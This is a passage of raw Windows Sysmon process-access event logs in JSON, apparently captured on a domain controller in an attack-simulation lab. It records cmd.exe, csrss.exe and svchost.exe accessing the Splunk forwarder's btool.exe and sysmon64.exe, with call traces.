{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3382,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-1102-5F25-0000-00107D6B0500}\r\nSourceProcessId: 1624\r\nSourceThreadId: 2112\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-1102-5F25-0000-00107D6B0500}","SourceProcessId":"1624","SourceThreadId":"2112","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 